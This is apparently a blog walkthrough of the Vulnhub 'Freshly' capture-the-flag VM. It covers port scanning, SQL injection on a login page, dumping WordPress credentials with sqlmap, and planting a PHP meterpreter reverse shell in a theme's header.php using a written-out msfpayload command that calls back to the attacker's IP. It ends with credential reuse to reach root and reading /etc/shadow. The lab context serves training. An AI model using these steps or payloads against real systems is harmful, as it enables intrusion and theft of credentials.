Freshly VM challenge

Blog post
Vulnhub

Download the VM: https://copy.com/I2tKBVNONgFrLZGK
View The Readme File: https://copy.com/tNj9nDzqKvefsBQe

The goal of this challenge is to break into the machine via the web and 
find the secret hidden in a sensitive file. If you can find the secret, 
send me an email for verification. :)

There are a couple of different ways that you can go with this one. Good luck!

Simply download and import the OVA file into virtualbox!

The Readme File:

FRESHLY VIRTUALBOX APPLIANCE
THIS WAS MADE WITH VIRTUALBOX 4.3.22!
JUST GO TO FILE AND IMPORT APPLIANCE, SELECT THE OVA FILE!


FRESHLY OS = UBUNTU 14.04 32BIT

CHALLENGE:

YOU MUST GAIN ACCESS TO THE SYSTEM AND FIND THE "SECRET" IN A SENSITIVE FILE.
SEND THE SECRET TO ADMIN [A] TOP-HAT-SEC.COM

THERE ARE A COUPLE WAYS THAT YOU CAN GAIN ACCESS TO THE SYSTEM VIA THE WEB.

GOOD LUCK!

Disclaimer: There are a couple of misleading vulnerabilities that (afaik) are not exploitable on this VM, I’ll not mention em and just do a walkthrough.

Freshly VM: 192.168.0.131
Attacking IP: 192.168.0.108

First, let’s do a port-scan and check out what’s open.

nmap-freshly

So there are 3 open ports on the running machine. First I check out port 80 and are greeted by a picture. It sort of feels likely that it is something more hidden on port 80 (;)) so let’s run dirbuster against it. I only ran the default small dictionary for a couple of seconds before I got a hit on something interesting.



dirbuster-freshly


The file login.php looks like a standard login page. Supplying credentials that are highly unlikely to be correct returns a 0. A standard sqli test yield the same result as that as well.


sqlitest-freshly



Performing a further test returns a 1 instead of 0 on the page. Sweet, progress. 

sqlibypass-freshly

burp-freshly

Inspecting the source-code or running an intercepting proxy to check what’s in the POST-data shows us that there are 3 variables. We know that we can inject in the Username field so let’s take the variables and shove them into sqlmap.

sqlimap-freshly


You’ll have to click the image to watch it but in it we can see that there’s a blind SQLi. It takes quite awhile to dump the database like this so it’s a good time to take a break. After awhile we can find the following in the dump:


Database: wordpress8080
Table: users
[1 entry]
+----------+---------------------+
| username | password            |
+----------+---------------------+
| admin    | SuperSecretPassword |
+----------+---------------------+

These credentials does not work on the login.php file so it’s time to check the other ports. On port 8080 there’s a wordpress installation running and it is possible to login to the web-application with the gained credentials at the admin panel (http://192.168.0.131:8080/wordpress/wp-admin). Nice, so through the wordpress application it is possible to inject a meterpreter shell for example. I generate one and then inject it into header.php.

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=4444 R


metwpshell-freshly

Now it’s time to setup the handler to catch the connection from the freshly vm. This will be done in Metasploit. Once the handler is running we make sure to visit a page that loads the header.php file on the wordpress application.

msfcon-freshly

Great. We got a meterpreter shell and it is running as daemon so now we need to escalate to root. We’ll try to change to root with the same credentials that were found in the wordpress database. Voila, root! So, now it’s time to find the secret file on the system. This file is most often called something like flag.txt and it’s usually placed in roots home directory, however, this is not the case this time. The secret is located in the end of /etc/shadow.

root-freshly



Tags: